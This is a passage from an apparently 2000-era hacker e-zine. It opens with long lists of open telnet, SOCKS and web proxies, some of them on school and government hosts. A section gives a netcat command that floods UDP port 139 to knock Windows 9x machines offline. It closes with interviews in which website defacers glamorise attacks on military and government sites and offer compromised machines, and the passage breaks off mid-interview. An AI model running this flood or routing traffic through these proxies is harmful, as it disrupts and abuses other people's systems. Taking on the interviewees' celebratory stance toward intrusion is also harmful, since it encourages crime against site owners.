Ed Telnettable Proxies ~~~~~~~~~~~~~~~~~~~ NotFound,200.36.19.225, NotFound,206.103.12.131, NotFound,210.56.18.225, NotFound,210.56.18.226, NotFound,210.56.18.241, NotFound,200.248.68.129, NotFound,210.56.18.253, NotFound,200.248.69.50, noeljo9.lnk.telstra.net,139.130.54.153, modemcable215.2-200-24.hull.mc.videotron.net,24.200.2.215, edtn004203.hs.telusplanet.net,161.184.152.139, NotFound,195.14.148.98, blissr.lnk.telstra.net,139.130.54.131, PPP46-166.lvsb.vsnl.net.in,202.54.46.166, cr216724724.cable.net.co,216.72.47.24, cr216724718.cable.net.co,216.72.47.18, 122-94.w3.com.uy,207.3.122.94, saward.lnk.telstra.net,139.130.55.98, icqtwsrv1.maiowoo.com,203.135.240.3, NotFound,212.22.69.35, 122-85.w3.com.uy,207.3.122.85, gw.eudynelson.com,207.176.25.66, sis-zeus.sville.edu.ph,207.0.119.67, dns-server1.tj.pa.gov.br,200.242.244.1, theleu.lnk.telstra.net,139.130.74.160, 210-55-191-125.ipnets.xtra.co.nz,210.55.191.125, nor24788-1.gw.connect.com.au,202.21.13.46, NotFound,210.161.200.82, www.slcr.cz,212.27.210.65, NotFound,210.56.19.5, northeastmicro.com,204.170.187.254, NotFound,195.5.33.222, marina.amakusa.gr.jp,210.164.238.50, h0040053c7824.ne.mediaone.net,24.128.48.55, NotFound,216.72.45.152, tconl9076.tconl.com,204.26.90.76, NotFound,193.227.185.210, NotFound,194.243.99.199, NotFound,202.54.48.85, NotFound,200.21.157.61, server.goway.com,205.206.42.162, web.urudata.com.uy,207.3.122.84, cr2167248104.cable.net.co,216.72.48.104, frontier.netline.net.au,203.28.52.160, interate.com.pe,209.45.73.174, 210-55-191-126.ipnets.xtra.co.nz,210.55.191.126, com3058-2.gw.connect.com.au,202.21.8.108, PPP46-254.lvsb.vsnl.net.in,202.54.46.254, NotFound,195.14.148.99, ibp.santa.krs.ru,195.161.57.133, mail.theova.com,195.14.148.65, cr2167254143.cable.net.co,216.72.54.143, NotFound,142.250.6.2, plebiscito.synapsis.it,195.31.227.14, ipshome-gw.iwahashi.co.jp,210.164.242.146, other.issei-dc.co.jp,210.164.241.99, x1-6-00-60-b0-66-08-f7.cust.planetcable.net,24.137.18.44, NotFound,209.177.38.98, www.ymts.sakha.ru,194.186.182.2, mail.ermanco.com,12.2.82.130, mail1.bikesusa.com,207.176.25.114, ewwmail.ozemail.com.au,203.108.128.242, modemcable106.22-200-24.timi.mc.videotron.net,24.200.22.106, patter.lnk.telstra.net,139.130.81.160, server.hirup.khmelnitskiy.ua,195.230.134.227, port58151.btl.net,206.153.58.151, wdpcbalt.wdpc.com,208.222.211.65, dns.gincorp.co.jp,210.164.86.34, ts18.svamberk.cz,212.47.11.231, mail.coolmore.com.au,203.12.145.98, NotFound,195.14.148.101, cr216724770.cable.net.co,216.72.47.70, ip110.gte5.rb1.bel.nwlink.com,209.20.218.110, ci272608-a.sptnbrg1.sc.home.com,24.4.115.144, edsl78.mpls.uswest.net,209.181.225.79, NotFound,210.114.231.130, mooty.lnk.telstra.net,139.130.81.14, NotFound,168.187.78.34, NotFound,203.116.5.58, c111.h202052116.is.net.tw,202.52.116.111, cr2167251178.cable.net.co,216.72.51.178, altona.lnk.telstra.net,139.130.80.123, NotFound,139.130.59.187, nevisco.city.tvnet.hu,195.38.100.242, edtn003590.hs.telusplanet.net,161.184.150.34, NotFound,193.15.227.125, dns1.ctsjp.co.jp,210.172.87.146, gaon.zg.szczecin.pl,195.116.25.98, NotFound,195.5.33.218, edtn003331.hs.telusplanet.net,161.184.149.29, edtn003725.hs.telusplanet.net,161.184.150.169, dt027n36.san.rr.com,24.30.137.54, tsp-proxy.tsss.com,12.2.81.50, austra53.lnk.telstra.net,139.130.56.114, NotFound,195.161.69.65, modemcable118.21-200-24.timi.mc.videotron.net,24.200.21.118, cascad.lnk.telstra.net,139.130.44.197, edtn003171.hs.telusplanet.net,161.184.148.123, tob24399-1.gw.connect.com.au,202.21.14.234, ad112-162.magix.com.sg,165.21.112.162, NotFound,195.146.98.226, NotFound,193.232.250.133, lesy.vol.cz,212.27.211.5, HSE-Montreal-ppp32859.qc.sympatico.ca,216.209.195.103, north.ocs.k12.al.us,216.77.56.66, adsl-98.cais.com,207.176.4.98, modemcable161.21-200-24.timi.mc.videotron.net,24.200.21.161, NotFound,195.146.97.178, fsf.santa.krs.ru,195.161.57.178, HSE-Montreal-ppp32305.qc.sympatico.ca,216.209.193.57, ohs.ocs.k12.al.us,216.77.56.122, NotFound,195.14.148.100, carver.ocs.k12.al.us,216.77.56.114, oms.ocs.k12.al.us,216.77.56.106, C824154A.podernet.com.mx,200.36.21.74, NotFound,193.15.228.156, wingate.shokoren.or.jp,210.145.221.99, cpu1555.adsl.bellglobal.com,206.47.27.36, NotFound,195.14.148.97, expocom.dial-up.cz,193.85.249.31, edtn003655.hs.telusplanet.net,161.184.150.99, mb-kop-p2.mbusa.net,63.65.123.172, www.sos.iqnet.cz,212.71.157.102, jeter.ocs.k12.al.us,216.77.56.98, modemcable241.4-200-24.hull.mc.videotron.net,24.200.4.241, ip48.gte5.rb1.bel.nwlink.com,209.20.218.48, sai0103.erols.com,207.96.118.243, wforest.ocs.k12.al.us,216.77.56.82, 165-246.tr.cgocable.ca,24.226.165.246, morris.ocs.k12.al.us,216.77.56.74, ken9029.tsukuba.accs.or.jp,210.154.99.29, www.cassvillesd.k12.wi.us,216.56.42.3, ns.elaso.cz,195.146.96.178, proxy.wmisd.k12.mi.us,199.176.179.4, SOCKS Proxies ~~~~~~~~~~~~~ NotFound,200.36.19.225, NotFound,206.103.12.131, NotFound,210.56.18.225, NotFound,210.56.18.226, NotFound,210.56.18.241, NotFound,200.248.68.129, NotFound,210.56.18.253, NotFound,200.248.69.50, noeljo9.lnk.telstra.net,139.130.54.153, modemcable215.2-200-24.hull.mc.videotron.net,24.200.2.215, edtn004203.hs.telusplanet.net,161.184.152.139, NotFound,195.14.148.98, blissr.lnk.telstra.net,139.130.54.131, PPP46-166.lvsb.vsnl.net.in,202.54.46.166, cr216724724.cable.net.co,216.72.47.24, cr216724718.cable.net.co,216.72.47.18, 122-94.w3.com.uy,207.3.122.94, saward.lnk.telstra.net,139.130.55.98, icqtwsrv1.maiowoo.com,203.135.240.3, NotFound,212.22.69.35, 122-85.w3.com.uy,207.3.122.85, gw.eudynelson.com,207.176.25.66, sis-zeus.sville.edu.ph,207.0.119.67, dns-server1.tj.pa.gov.br,200.242.244.1, theleu.lnk.telstra.net,139.130.74.160, 210-55-191-125.ipnets.xtra.co.nz,210.55.191.125, nor24788-1.gw.connect.com.au,202.21.13.46, NotFound,210.161.200.82, www.slcr.cz,212.27.210.65, NotFound,210.56.19.5, northeastmicro.com,204.170.187.254, NotFound,195.5.33.222, marina.amakusa.gr.jp,210.164.238.50, h0040053c7824.ne.mediaone.net,24.128.48.55, NotFound,216.72.45.152, tconl9076.tconl.com,204.26.90.76, NotFound,193.227.185.210, NotFound,194.243.99.199, NotFound,202.54.48.85, NotFound,200.21.157.61, server.goway.com,205.206.42.162, web.urudata.com.uy,207.3.122.84, cr2167248104.cable.net.co,216.72.48.104, frontier.netline.net.au,203.28.52.160, interate.com.pe,209.45.73.174, 210-55-191-126.ipnets.xtra.co.nz,210.55.191.126, com3058-2.gw.connect.com.au,202.21.8.108, PPP46-254.lvsb.vsnl.net.in,202.54.46.254, NotFound,195.14.148.99, ibp.santa.krs.ru,195.161.57.133, mail.theova.com,195.14.148.65, cr2167254143.cable.net.co,216.72.54.143, NotFound,142.250.6.2, plebiscito.synapsis.it,195.31.227.14, ipshome-gw.iwahashi.co.jp,210.164.242.146, other.issei-dc.co.jp,210.164.241.99, x1-6-00-60-b0-66-08-f7.cust.planetcable.net,24.137.18.44, NotFound,209.177.38.98, www.ymts.sakha.ru,194.186.182.2, mail.ermanco.com,12.2.82.130, mail1.bikesusa.com,207.176.25.114, ewwmail.ozemail.com.au,203.108.128.242, modemcable106.22-200-24.timi.mc.videotron.net,24.200.22.106, patter.lnk.telstra.net,139.130.81.160, server.hirup.khmelnitskiy.ua,195.230.134.227, port58151.btl.net,206.153.58.151, wdpcbalt.wdpc.com,208.222.211.65, dns.gincorp.co.jp,210.164.86.34, ts18.svamberk.cz,212.47.11.231, mail.coolmore.com.au,203.12.145.98, NotFound,195.14.148.101, cr216724770.cable.net.co,216.72.47.70, ip110.gte5.rb1.bel.nwlink.com,209.20.218.110, ci272608-a.sptnbrg1.sc.home.com,24.4.115.144, edsl78.mpls.uswest.net,209.181.225.79, NotFound,210.114.231.130, mooty.lnk.telstra.net,139.130.81.14, NotFound,168.187.78.34, NotFound,203.116.5.58, c111.h202052116.is.net.tw,202.52.116.111, cr2167251178.cable.net.co,216.72.51.178, altona.lnk.telstra.net,139.130.80.123, NotFound,139.130.59.187, nevisco.city.tvnet.hu,195.38.100.242, edtn003590.hs.telusplanet.net,161.184.150.34, NotFound,193.15.227.125, dns1.ctsjp.co.jp,210.172.87.146, gaon.zg.szczecin.pl,195.116.25.98, NotFound,195.5.33.218, edtn003331.hs.telusplanet.net,161.184.149.29, edtn003725.hs.telusplanet.net,161.184.150.169, dt027n36.san.rr.com,24.30.137.54, tsp-proxy.tsss.com,12.2.81.50, austra53.lnk.telstra.net,139.130.56.114, NotFound,195.161.69.65, modemcable118.21-200-24.timi.mc.videotron.net,24.200.21.118, cascad.lnk.telstra.net,139.130.44.197, edtn003171.hs.telusplanet.net,161.184.148.123, tob24399-1.gw.connect.com.au,202.21.14.234, ad112-162.magix.com.sg,165.21.112.162, NotFound,195.146.98.226, NotFound,193.232.250.133, lesy.vol.cz,212.27.211.5, HSE-Montreal-ppp32859.qc.sympatico.ca,216.209.195.103, north.ocs.k12.al.us,216.77.56.66, adsl-98.cais.com,207.176.4.98, modemcable161.21-200-24.timi.mc.videotron.net,24.200.21.161, NotFound,195.146.97.178, fsf.santa.krs.ru,195.161.57.178, HSE-Montreal-ppp32305.qc.sympatico.ca,216.209.193.57, ohs.ocs.k12.al.us,216.77.56.122, NotFound,195.14.148.100, carver.ocs.k12.al.us,216.77.56.114, oms.ocs.k12.al.us,216.77.56.106, C824154A.podernet.com.mx,200.36.21.74, NotFound,193.15.228.156, wingate.shokoren.or.jp,210.145.221.99, cpu1555.adsl.bellglobal.com,206.47.27.36, NotFound,195.14.148.97, expocom.dial-up.cz,193.85.249.31, edtn003655.hs.telusplanet.net,161.184.150.99, mb-kop-p2.mbusa.net,63.65.123.172, www.sos.iqnet.cz,212.71.157.102, jeter.ocs.k12.al.us,216.77.56.98, modemcable241.4-200-24.hull.mc.videotron.net,24.200.4.241, ip48.gte5.rb1.bel.nwlink.com,209.20.218.48, sai0103.erols.com,207.96.118.243, wforest.ocs.k12.al.us,216.77.56.82, 165-246.tr.cgocable.ca,24.226.165.246, morris.ocs.k12.al.us,216.77.56.74, ken9029.tsukuba.accs.or.jp,210.154.99.29, www.cassvillesd.k12.wi.us,216.56.42.3, ns.elaso.cz,195.146.96.178, proxy.wmisd.k12.mi.us,199.176.179.4, WWW/FTP Proxies ~~~~~~~~~~~~~~~ Location Provider System Port Service(s) AE pd4k-2.emirates.net.ae 8080 WWW / FTP AR proxyweb2.ssdnet.com.ar 8080 WWW / FTP AT erde.salzburg.at 8080 WWW / FTP AU Hutchisons T. proxy.hutch.com.au 80 WWW / FTP AU OzEmail netcachesyd3.ozemail.com.au 8080 WWW / FTP AE Government lino.privacy.fgov.be 8080 WWW / FTP BN Brunei proxy1.brunet.bn 8080 WWW / FTP BR Telemar CAICO.telern.com.br 80 WWW / FTP CA Csjlor www.csjlor.qc.ca 8080 WWW / FTP CA RAPIDUS 237-67-239.tr.cgocable.ca 80 WWW / FTP CH proxy.vtx.ch 8080 WWW / FTP COM IWVISP proxy.iwvisp.com 8080 WWW / FTP COM HRO gateway.hro.com 8080 WWW / FTP COM RipNET IS CacheFlow01.RipNET.comZ 8080 WWW / FTP CZ inet01.cabletel.cz 80 WWW / FTP CO Compunet proxy.compunet.net.co 3128 WWW / FTP DE TU Berlin andele.cs.tu-berlin.de 80 WWW / FTP DE Uni-Kl. maccaroni.unix-ag.uni-kl.de 3128 WWW / FTP DE ibaserver.ub.uni-dortmund.de 8080 WWW / FTP DK www-cache.net.uni-c.dk 3128 WWW / FTP EDU hermes.curry.edu 8080 WWW / FTP ES Softec linux.softec.es 8080 WWW / FTP FR cri.ens-lyon.fr 3128 WWW / FTP FR INFONIE proxy2.infonie.fr 80 WWW / FTP HR gita.srce.hr 80 WWW / FTP IL Goldnet goldcache.goldnet.net.il 80 WWW / FTP IS dyna0.islandia.is 8080 WWW / FTP IT colnuovo.iuss.unipv.it 80 WWW / FTP JP inet-sv.zenon.co.jp 8080 WWW / FTP JP ns.hiu.ac.jp 80 WWW / FTP JP Tokyo Uni kpcu.kumamoto-pct.ac.jp 8080 WWW / FTP KR Taegu biho.taegu.ac.kr 8080 WWW / FTP KR Kyunghee cvs2.kyunghee.ac.kr 8080 WWW / FTP LB data450.dm.net.lb 3128 WWW / FTP NET bright.net cacheflow.bright.net 8080 WWW / FTP NET Stargate Ind. cacheflow.tcg.sgi.net 8080 WWW / FTP NET BRASILNET magic.brasilnet.net 8080 WWW / FTP NET Global One gip-rjo-1-wc01.br.global-one.net 8080 WWW / FTP NG engine3.micro.com.ng 8080 WWW / FTP NL GelreVision webproxy.gelrevision.nl 80 WWW / FTP NO webcache1.globalone.no 80 WWW / FTP PH Info mail2.info.com.ph 3128 WWW / FTP PH electron2.msc.net.ph 3128 WWW / FTP PT Teleweb caclis01.teleweb.pt 3128 WWW / FTP QA Qatarnet proxy.qatar.net.qa 8080 WWW / FTP RO lhab-gw.soroscj.ro 80 WWW / FTP RU adam.rosinkas.ru 80 WWW / FTP SE Varnamo ns.varnamo.se 8080 WWW / FTP SG proxy1.tp.ac.sg 80 WWW / FTP TR Turnet ankara3.turnet.net.tr 8080 WWW TW Golden club.golden.com.tw 8080 WWW TW IS c1.h202052106.is.net.tw 80 WWW / FTP UK poptel.net softy.poptel.org.uk 8080 WWW / FTP UK proxy1.cdesd.k12.or.us 80 WWW / FTP US K12 stpauls.pvt.k12.al.us 8080 WWW / FTP US cache.manistee-isd.k12.mi.us 80 WWW / FTP YE ? sah3.ye 80 WWW / FTP ZA M-Web proxy-rnb2.mweb.co.za 80 WWW / FTP ZA M-Web proxy.cpt.mweb.co.za 80 WWW / FTP ZW Cybergate proxy.cybergate.co.zw 8080 WWW / FTP ZW Africaonline proxy.africaonline.co.zw 8080 WWW / FTP @HWA 05.0 Simple Windows DoS using common tools and UDP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HWA labs: Twstdpair This is a very simple but deadly windows DoS that appears to work on all Win9x boxes. You need a large binary file as the datafile (fuckfile.bin) to create a long stream of data, we used an 80 meg binary file for test purposes, essentially you will be flooding the well known netbios TCP/UDP port 139, in this case we'll be attacking with UDP packets. The result is that the attacked system will falter and eventually fail making it essentially useless and losing net connection. "Discovered" accidentally by Twstdpair, when retaliating against some unruly port scanning kiddies harassing his system. :-p Useage: You need netcat for this example. > cat fuckfile.bin | nc -u 24.111.111.111 139 You can issue this attack from *nix boxes or from windows using the windows netcat port. System will become unresponsive and eventually die. @HWA 06.0 Slash interviews website defacer/cracker Fuqrag Jan 10th 2000 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HWA Exclusive. You may reproduce this if credit is given for the source, quote http://welcome.to/HWA.hax0r.news, an HNN affiliate. sure.. why not > Tell us something about You ? ! > How did U start defacing > ? well.. there are tons of reasons why i did what i did.. (and still might do.. not sure yet) but.. i started mostly cause i was extremely bored > bored ?! yeah.. as in had nothing else better to do > :))) > so U started defacing..... plus.. i was also depressed over my gf dumping me.. > :) > :( and some other things as well yeah.. i'd never been into defacing shit before > how llong have U been hacking !? didn't really have a reason to damn.. let's see.. i just turned 30 back in october and i've been in the scene since like when i was 12 so.. damn.. that's a long time > :))))) > that's long > how did U start hacking !?? ! > was it the BBS age back then !? hangin out with the wrong (or maybe right) people on bbs's .. shit like that > so why did U stop defacing !? mostly to take a break... and give the .gov's & .mil's a break as well.. as well as every 1 else in between > but why did U hit all those high profiled sites > !?! > why .mil and .gov the bigger the better i figured this.. it's like.. if you're gonna scream your head off.. then get on top of the biggest buildings.. and then scream > Is there an defacment that U'r most proud of > ? hmm.. several actually hard to pick just 1 > which R that !? the NSA website, DiSA, deca.mil, usitc.gov, the coe.fr, and probably the intelsat.int, as well as the 2 nato sites.. also kingston.com that was my last 1 and it was on thanksgiving day ;) > :) and let's not forget dairyqueen heh > hehe > U declared war to the Government on U'r deca.mil defacment right !? sorta but not really pretty much every 1 any 1 with power that abuses it (be it country or company) > What do You think of the FBI ?!:) you really wanna know what i think about the fbi? uhmm.. ok they're a bunch of fuckin morons > :)))) > that's true > :) > U ain't afraid to get raided !? yeah not really > how is that !? fuck'em if they can't take a joke! i mean like.. what's to be afraid of ya know? > well.... > U can go to jail the worst that can happen is i go to prison.. > well, that's it > U goto jail > and U'r life is all fucked up yeah.. but as long as i remain who i am, as an individual... > U can't get a job in my thoughts.. my beliefs.. > everyone thinks U killed somebody > I'll tell U sumtin > Hacking changed my life > for good > That's my obsesion > Hacking is a state of mind baby > and I don't give a fuck If I get raided i agree > do U ? absolutely > I meen i know the defacing stuff is not cool > yeah > but > I deface to spread the message out > I don't give a fuck about fame > fame meens nothing to me neither do i tell ya the truth... i honestly didn't think any 1 would care or even notice i figured that there was so much shit already being hit before i came along.. that i didn't think it would really matter > But people did notice and i'm not really into interviews and stuff.. but, that's why only people like you, and osall, etc.. not the nytimes.. or cnn, etc.. shit like that i know they did if i'd known that i was gonna get the kindof attention that i have gotten before i started... i would've re-thought my actions i'm actually a very private person usually keep to myself most of the times > U married !? > :) heh no > :( > so what do U do in U'r life !? me and my ex- were together 3+ years.. we were suppose to get married like next summer.. but.. oh well actually.. i'm a freelance security consultant ;) > :) > that suits U fine yeah.. but i went to filmschool > yeah !? that's what i use to wanna do and maybe some day i still will.. who knows > "Hackers the sequel " by fuqraq heheh uhmm.. not quite i was interviewed for a documentary awhile back though it's called: "Hackers, Crackers, and Lamers" > no shit > :))) some chick that does documentaries for cnn or some shit yeah they actually filmed me doing "live-hacks" > U heard of flipz !? > :) heh yeah > U 2 know each other !? we have our differences from time to time.. but.. we always end up still being good friends > kewl he annoys the shit out of me.. but he's still cool > U were in gH and sSH ?! gH yes.. sSh no.. > no !? even though they put me on their member's list (i dunno why).. i was never a member > I thought I saw U in their members list not even an affiliate sSh is a bunch of lamers with nuthin better to do > U plan to start hacking again ? dude.. i'm always hackin > :))) > aaight just not defacin right at the moment and not nt bawx's either > NT sux i fuckin hate nt yeah it does > I advise people to put BSD or SunOS > but no yeah.. > They R smarter than me > "We will put what we want" i run linux (SuSE), and NetBSD mostly > They:"sumtin what is easy to use" > ME: "Sumting that is easy to penetrate in" heheh > They:"U'r fired" definitely the latter ME: aight.. go ahead and be a loser heheh > ME:" ok, just wait till I get home and find some sploit for Youre box" > heheh no doubt > bsd is coo > Never tried suse doh i like it SuSE is nice > I heard it comes on 7 cd-s 6 > heh ;) > U code !? a little > c !? > perl !? some c (just startin to get really heavy in it) perl, shell script, pascal yes.. i do have pascal on my linux bawx > :))) heh > I have VB on my linux box really..? > can U belive it !? under wine? > y coz.. under windows.. i do mostly vb > no shit > me too yeah.. i love vb > it's good i got started usin it years back, when i was makin front-ends for access db's also do some xbase legacy code (like fox pro, etc..) > I started programing in qb firsth > I knew only 1 command > U know what that was !? yeah.. me too actually.. i started with gwbasic > kewl under like dos 3.1 or some shit like that > the first command I learned in qb was.... > BEEP > :)))))) heh that's cool > Than i started learning > IF then ahhh.. the memories > for NExtT > N shit > then came VB > winsock programing > aaaaaargghhhhhh > winsock1.open > shit > :))))) heh > It's coo to program > to know how to program yeah it is > U on win box now !? most people take it for granted no linux > k i'm always in unix of some sort > aaight > dewd lately i've been rewtin bawx's in china & korea ya? > can U do me a favor !? what's that? > www.akz.hr > I'm kinda admin on that box > can U check it out > do a /whois slasht sure.. > U'll see I come from rtr.akz.hr > don't deface plz > I know U can :)))) heh.. i won't > just gimme some proof what do u want me to do.. just check it out on security and shit? > yeah > winNT 40 > :))) ok.. > k but.. > what !? i'm not really that much into nt.. > well, just try and i only know a few ways of gettin in.. that's about it > ok > I'm a shitty admin > so It shouldn't be a problem > :)))))) well.. > well... > ? nt isn't that hard to admin > I know > :))))) and on top of that i don't know all of the vulnerabilities for nt > I'm kinda into solaris 'n stuph me too i won't say that i don't use scripts.. sure i do.. every 1 does.. but, when it comes to nt, that's usually how i've had to get in.. except maybe port 139.. and even then so i guess i could sit around and try to brute ur pop3 > :))) every 1 thinks i know alot about NT and shit.. but i never claimed i was anything great.. i have your shit is safe from msadc > hehhe > :))) which is good.. coz that shit is too easy.. > heh > I ain't a shitty admin afterall > :))) no you're not heh > hehe > :)) if you ever need any rewted korean bawx's let me know ;) got plenty heh > :))))) > :P > Is there any1 on the scene that U trully admire !? hmm yeah.. i have a lot of respect for Erik B. > that's the dewd that sings with rakim !? !?! > :))) also peter Shipley no.. i meant.. bloodaxe eric bloodaxe > oh, ok and also Peter Shipley from dis.org > ooooohhh that dude's a mad coder also.. 1 more dude.. for sure.. > that is .... !? i have a lot (and i do mean a lot) of respect for aempirei aka.. ambient empire he's a good friend.. and a bad ass coder as well as well as XXyla.. (yes.. a chick).. she's bad ass when it comes to fones > aaight and another chick ;) named crow (she can code..) > any1 U hate !? not really.. > not hate > just don't like i don't really "hate" or dislike any 1 i accept every 1 for who they are no matter the skill level > kewl > CAn I ask a personal q !? as long as they're straight up with me.. i'm always straight up with them sure.. go ahead > U going on a party for New year's eve !? > :))) uhmm.. probably not > not ?!?! nah > why is that !? i dunno > well...ok > just don't get mad drunk > and try to hack www.fbi.gov i'd rather be with my ex-.. but since she doesn't want me any more.. > :( oh well heh probably sit around and deface shit > :P j/k > :))))) or.. maybe not.. ;) > :) who can tell > "US government says: Hackers give us a brake" > Will U givem a brake! ? hmm yeah i'll give 'em a break me breakin' my foot off up in dat ass heh.. seriously.. tho > :))) yeah.. i'll leave 'em alone > aaight coo > Ok > the editor is gonna kill me now > I'm way over the limit with this why's that? oh.. heh > Any shouts U wanna give what's their page again? uhmm.. sure.. > of the ezine !? > welcome.to/hwa.hax0r.news much luv to: xxyla, aempirei, cristyn, vghk, f0bic, flipz, and nostalg1c > aight > thanx for the interview bro > keep it real on show them what's hacking all about but.. u don't have to put that if u don't want to.. but if u do.. definitely to them.. ;) aight plan on it and thanks for your time as well.. ;) > peace out -----------------------------------------/* end interview /*----------------------------- defaced sites: [99.10.27] NT [fuqrag] Commander, Helicopter Tactical Wing, U.S. Atlantic Fleet (eagle.chtwl.spear.navy.mil) [99.10.27] NT [fuqrag] Naval Surface Warfare Center, Carderock Division (scotty.navsses.navy.mil) [99.10.27] NT [fuqrag] Commander Submarine Force U.S. Pacific fleet (www.csp.navy.mil) [99.10.27] NT [fuqrag] Defense Information School (www.dinfos.osd.mil) [99.10.27] NT [fuqrag] Federal Mediation and Conciliation Service (www.fmcs.gov) [99.10.27] NT [fuqrag] Marine Corps Base, Hawaii (www.mcbh.usmc.mil) [99.10.27] NT [fuqrag] Naval Security Group Activity Pensacola (www.nsg.navy.mil) [99.10.27] NT [fuqrag] U.S. International Trade Commission (www.usitc.gov) [99.10.28] NT [fuqrag] Dairy Queen (www.dairyqueen.com) [99.10.28] NT [fuqrag] U.S. Minerals Management Service (www.mms.gov) [99.10.28] NT [fuqrag] TriStar Computers International (www.tristar.com) [99.10.29] NT [fuqrag] U.S. Office of Personnel Management (apps.opm.gov) [99.10.29] NT [fuqrag] #2 U.S. Minerals Management Service (www.mms.gov) [99.10.30] NT [fuqrag] California State Assembly Democrats (democrats.assembly.ca.gov) [99.10.30] NT [fuqrag] Domino Server for the Office of Civilian Radioactive Waste Management (domino1.rw.doe.gov) [99.10.30] NT [fuqrag] Space Shuttle Flight Tracker, Johnson Space Center (flight.jsc.nasa.gov) [99.10.31] NT [fuqrag] (ncr) DISA (dssg-web-srv.ncr.disa.mil) [99.10.31] NT [fuqrag] City of Fresno Gov (gw.fresno.gov) [99.11.02] NT [fuqrag] Defense Commissary Agency (www.deca.mil) [99.11.02] NT [fuqrag] U.S. Navy Electronic Commerce Homepage (www.ec.navsup.navy.mil) [99.11.03] NT [fuqrag] Naval Medical Research Institute (www.nmri.nnmc.navy.mil) [99.11.06] NT [fuqrag] Office of Small & Disadvantaged Business Utilization, Department of Transportation (osdbuweb.dot.gov) [99.11.11] NT [fuqrag] PWD Malaysia (corp.jkr.gov.my) [99.11.11] NT [fuqrag] Ministcre de l'Environnement et de l'Énergie de l'Ontario (ene.gov.on.ca) [99.11.11] NT [fuqrag] Chinese Ministry of Foreign Affairs (fmprc.gov.cn) [99.11.11] NT [fuqrag] Taipei Government (intra.taipei.gov.tw) [99.11.12] NT [fuqrag] Belgium Ministry of Economic Affairs (mineco.fgov.be) [99.11.12] NT [fuqrag] Supremo Tribunal Federal (www.stf.gov.br) [99.11.12] NT [fuqrag] Shj Library, Saudi Arabia (shjlib.gov.ae) [99.11.12] NT [fuqrag] Singapore Government Shopfront (shop.gov.sg) [99.11.14] NT [fuqrag] Unreal Web site (www.unreal.com/index2.html) [99.11.22] NT [fuqrag] IntelSat (www.intelsat.int) [99.11.22] NT [fuqrag] #1 NATO Airborne Early Warning and Control (www.naewfc.nato.int) [99.11.22] NT [fuqrag] Supreme Headquarters Allied Powers Europe (SHAPE) (www.shape.nato.int) [99.11.23] NT [fuqrag] Atlantic Council of the United States (www.acus.org) [99.11.23] NT [fuqrag] Council of Europe Convention (www.coe.fr) [99.11.23] NT [fuqrag] John Romero's Ion Storm (www.ionstorm.com) [99.11.23] NT [fuqrag] Canopus Corporation (www.justedit.com) [99.11.24] NT [fuqrag] Hemp Cat (www.hempcat.com) [99.11.25] NT [fuqrag] Asia-Pacific Economic Cooperation (www.apecsec.org.sg) [99.11.25] NT [fuqrag] Kingston Technology Corp (www.kingston.com) Total Defacements: 41 - defacement list provided by attrition.org Slash is an HWA correspondant, email him at smuddo@yahoo.com cc: your comments to cruciphux@dok.org @HWA 07.0 Interview with sSh member YTcracker Jan 10th 2000 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HWA Exclusive. You may reproduce this if credit is given for the source, quote http://welcome.to/HWA.hax0r.news, an HNN affiliate. ytcracker is a member and founder of the 'new' sSh 2000 hacking group (Sesame Street Hackers, formerly run by dap) and has defaced many websites in recent months you can see mirrors of his work on Attrition.org a site that archives web defacements. The IRC interview: Session Start: Mon Jan 10 12:07:23 2000 [12:07] yo So you up for an interview now? [12:07] hit it ok cool [12:07] *grammar mode on* *g* [12:07] leave the channel [12:07] go back [12:07] get ops ok [12:09] back to the task at hand [12:09] haha oky lets get some basic history, how old are you and how long have you been on the internet? you can refuse to answer any questions btw :) [12:09] i'm 17 and five months, been on the inet since i was six. do you code in any languages and do you take computer courses at school? or are you self taught? [12:10] i'm completely self-taught and i hate school [12:10] haha you've cracked a good many sites, do you use your own exploits or scripts from others? [12:11] i code in a load of languages but my strongest skills are probably in cpp and vb. [12:11] i use other peoples stuff mostly [12:11] msadc is probably what made me NoToRIOUs [12:11] hahah [12:11] i do know how to code in core x86 assembler would you consider yourself a 'Script Kiddie" then? [12:12] i wouldn't, no a cracker? [12:12] a defacer [12:12] well, former defacer [12:12] i don't even really take part in that much anymore when you were defacing, what was the main reason behind it? just because you could? or boredom? or fame? or some other reason(s)? [12:13] i wrote an article detailing my motives [12:13] i would argue it was a mix of a lot of thing [12:13] i didn't intend for the media to take any interest yes you did, It was on HNN but that was a while ago. [12:14] yea [12:14] hahahah [12:14] i gotta do my laundry ok wanna continue later? [12:14] haha no go ahead [12:14] i was reminding myself k I was wondering about sSh, what plans do you hold for the 'group'? [12:15] i don't really know anymore [12:15] i've been writing a lot of code for pure-security what kind of code? [12:15] exploits and automation tasks [12:15] i wrote a spammer for mosthated [12:15] hahahah hehe how is your relationship with mosthated? what did you think of his 20/20 appearance? [12:16] mosthated is really cool [12:16] i think that it's the media's editors that made him look like a hoodlum [12:17] more or less many people seem to dis him simply coz he's been on tv and such, I guess its cool to dis 'famous' ppl in the scene. [12:17] i think it's a combination of jealousy agreed [12:17] and envy plus it makes you look cool to dis someone that is well known. [12:17] "Freedom of the press is limited to those who own one." [12:18] hahahah perhaps yeah I like that quote [12:18] i will agree that what i did requires no *real* skill [12:18] then again ./wow doesn't either is there anything you'd like to say to 'aspiring crackers' out there? since many newbies seem to think defacing is something to aspire towards [12:19] i'd like to say it isn't really worth it [12:19] for a while, it is so you change your mind from your article on HNN? [12:19] it's like graffiti very much [12:19] no no [12:19] let me explain ok [12:19] i go out and paint still [12:19] bombing is something that i like to do [12:20] but it is illegal [12:20] the ends DO justify the means [12:20] but only if you are fighting for something worth fighting for [12:20] not [12:20] "i luv my girl, peaz" [12:20] you can tell her that [12:20] you can't tell the world the plight of the chechyans [12:20] or tell the world about the government's weak security Have you ever been raided or fear that you may be? I heard rumours but they were unconfirmed [12:23] nah [12:23] i ducked it successfully [12:23] i hope [12:23] haha were you contacted by any law enforcement officials or security personnel? or did they not 'find' you? [12:24] didn't find me heh whats your opinnion on Kevin Mitnick? (nearly done btw) :) [12:26] one sec k [12:27] on the fone [12:27] heheh ok feds? lol [12:27] hahah no ;) [12:27] angry fone marketers fucking hate them [12:27] yea they are dumb [12:27] i think that kevin mitnick is being unjustly held [12:28] i mean [12:28] murders don't spend that much time what about internet criminals in general?, the sentences being handed 